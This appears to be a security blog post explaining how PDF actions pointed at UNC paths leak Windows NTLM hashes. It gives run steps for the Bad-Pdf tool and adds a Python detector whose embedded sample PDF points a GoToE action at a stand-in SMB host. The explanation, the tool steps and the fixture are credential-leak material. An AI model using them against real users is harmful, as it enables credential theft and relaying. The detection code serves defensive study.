How a PDF can be abused to steal Windows credentials

  • JavaScript: Adobe Reader contains a JavaScript engine similar to the one used by web browsers, but with a slightly different API for manipulating PDF content on the end user's machine.
  • Launch actions: a PDF file may launch any command on the operating system, after user confirmation through a popup message. Different command lines may be specified for Windows, Unix and Mac. On Windows only, parameters can be passed to the command. Up to Adobe Reader 9.3.2, the CVE-2010-1240 vulnerability made it possible to fool users by modifying the text of the popup message.
  • Embedded files: a PDF file may contain attached files, which can be extracted and opened from the reader. This trick may be used to hide malicious executables and bypass some antivirus engines, but Adobe Reader refuses to open embedded files whose extension is on a blacklist (EXE, BAT, CMD, etc.).
  • GoToE actions: a PDF file may be embedded inside another PDF file, and a GoToE action may be used so that Adobe Reader opens the embedded PDF file automatically without notifying the user. This feature may be used to hide a malicious PDF file within a normal-looking PDF file and fool many antivirus engines.

Windows New Technology LAN Manager (NTLM)

NTLM is the challenge-response authentication protocol that Windows still uses wherever Kerberos is not available, and it fires silently: when a program opens a UNC path such as \\server\share\file.pdf, the SMB client connects to that server and answers its challenge with the logged-on user's credentials, without any prompt. Point a PDF action (GoToE, GoToR or Launch) at a UNC path on a host you control, and a reader that follows the path without asking makes the victim's machine send its Net-NTLM response (commonly called the NTLM hash) to your listener, where it can be cracked offline or relayed. That is the trick Bad-Pdf packages up below.

Demonstration

  • Clone the project: git clone https://github.com/deepzec/Bad-Pdf.git
  • Change into the project folder: cd Bad-Pdf
  • List the contents of the folder: ls
  • Run the tool: python badpdf.py
Here is a detailed VirusTotal report on the uploaded file; it displays the abused properties and the metadata of the malicious file.
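The "abused properties" a scanner such as VirusTotal reports are the PDF features listed at the top of this article: JavaScript, Launch actions, embedded files and GoToE actions, plus, for a credential-stealing file, an action whose /F target is a UNC path. The following is an added example (my code, not part of the article, the Bad-Pdf project or pdfid) of a pdfid-style checker that counts those name keywords in a raw PDF and pulls out any UNC target. The sample PDF embedded in it is constructed for the demo and is not the file Bad-Pdf produces; adding /GoToR, /OpenAction, /AA and /URI to the keyword list is my choice, since a credential leak needs an action and something that triggers it on open.

```python
"""Flag PDF features abused to steal Windows credentials (pdfid-style)."""
import re
import sys

# Name keywords worth counting. /JS, /JavaScript, /Launch, /EmbeddedFile and
# /GoToE are the features the article lists; /GoToR, /OpenAction, /AA and /URI
# are my additions (an NTLM-leak PDF needs an action plus an on-open trigger).
SUSPECT_KEYWORDS = (
    b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile",
    b"/GoToE", b"/GoToR", b"/OpenAction", b"/AA", b"/URI",
)

# On disk a PDF literal string escapes each backslash, so the UNC prefix "\\"
# of \\host\share shows up as four backslash bytes inside "( ... )".
UNC_PREFIX = b"\\\\\\\\"
UNC_IN_F = re.compile(rb"/F\s*\(" + re.escape(UNC_PREFIX) + rb"([^)]*)\)")


def count_keywords(data: bytes) -> dict:
    """Count each suspect name, requiring a delimiter after it so that /JS
    never matches /JSX and /AA never matches a longer name."""
    counts = {}
    for kw in SUSPECT_KEYWORDS:
        n = len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9])", data))
        if n:
            counts[kw.decode()] = n
    return counts


def find_unc_targets(data: bytes) -> list:
    """Return every UNC path used as the /F target of an action, un-escaped."""
    targets = []
    for m in UNC_IN_F.finditer(data):
        raw = UNC_PREFIX + m.group(1)
        # Undo PDF string escaping: "\\" -> "\" (an escaped ")" is not handled).
        targets.append(raw.replace(b"\\\\", b"\\").decode("latin-1"))
    return targets


def classify(data: bytes) -> dict:
    """Summarise a raw PDF: keyword counts, UNC targets and a verdict."""
    counts = count_keywords(data)
    unc = find_unc_targets(data)
    if unc:
        verdict = "ntlm-leak"      # an action points at an SMB share
    elif any(k in counts for k in ("/JS", "/JavaScript", "/Launch",
                                   "/EmbeddedFile", "/GoToE")):
        verdict = "suspicious"     # one of the abusable features is present
    else:
        verdict = "benign"
    return {"keywords": counts, "unc_targets": unc, "verdict": verdict}


# Constructed sample (not Bad-Pdf output): a one-page PDF whose /OpenAction is
# a GoToE action with /F pointing at a share on TEST-NET host 192.0.2.10.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"4 0 obj << /S /GoToE /F (\\\\\\\\192.0.2.10\\\\share\\\\x.pdf) /D [0 /Fit] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    # Usage: python pdfcheck.py [file.pdf]; with no argument the sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for key, value in classify(data).items():
        print(f"{key}: {value}")
```

Run it over the file Bad-Pdf generated in the demonstration: if a GoToE/GoToR/Launch action and a UNC target show up, that is exactly what the VirusTotal report calls the abused properties. Two caveats a raw byte scan shares with pdfid: names can be hidden inside compressed object streams or written with hex escapes (/Go#54oE), so flatten the file first, for example with qpdf --qdf --object-streams=disable in.pdf out.pdf, before trusting a "benign" verdict.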


Mr Akuma | cyber security enthusiast | Security Noob

Akshay Jain